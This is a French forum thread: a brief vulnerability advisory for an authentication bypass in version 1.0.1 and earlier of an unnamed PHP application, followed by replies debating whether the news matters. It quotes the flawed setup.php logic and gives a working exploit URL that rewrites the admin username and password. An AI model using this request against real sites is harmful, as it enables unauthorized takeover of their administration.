type : bypass de l'authentification admin
version vulnérable : 1.0.1 et inférieures
solution : pas d'officiel, il est recommandé alors de proteger l'acces par un htaccess

Le problème résulte d'une erreur présente au niveau du script "setup.php" qui ne filtre pas correctement la variable "check", qui permettrai alors d'accéder a l'administration sans authentification.

partie du fichier setup.php problèmatique :

include("config.php"); 
include("$path_data/setup.php"); 
$check = $_REQUEST['check']; 
$pass = $_REQUEST['pass']; 
$user = $_REQUEST['user']; 
if ($check == "admin" && $pass == $password && $user == $username) { 
showsetup(); 
} elseif (($check == "admin") && ($pass != $password || $user != $username)) { 
adminerror(); 
} elseif ($check == "yes") { 
write($_REQUEST); 
} else { 
admin(); 

Il suffit avec cela de faire :
http://[hote]/setup.php?check=yes&username=admin&password=admin

http://www.horslimite.net/?section=news&news=1117342413
rédigé par chapodepay,
faille découverte par SoulBlack - Security Research http://www.soulblack.com.ar


________________________
je fais du monde virtuel la vie que j'aurais aimé avoir
http://www.horslimite.net
webmastering & Co :)

Sans vouloir te vexer, je ne voi pas l\'interet de cette news... On est à la version 1.9.x
Ceux qui utilise la version 1.0.x devraient plutôt changer de version ...

Sky

_______________________
Graphiks : Cours PHP

=> à quoi sert internet explorer ?
=> à télécharger firefox

l\'interet? j\'en ai trouvé plein... donc je pense kil est utile de faire passer le mot.

_______________________
je fais du monde virtuel la vie que j'aurais aimé avoir
http://www.horslimite.net
webmastering & Co :)

Mais, si une personne utilse encore la 1.0 ... faut leur dirent de changer de version ... enfin, pas grave

_______________________
Graphiks : Cours PHP

=> à quoi sert internet explorer ?
=> à télécharger firefox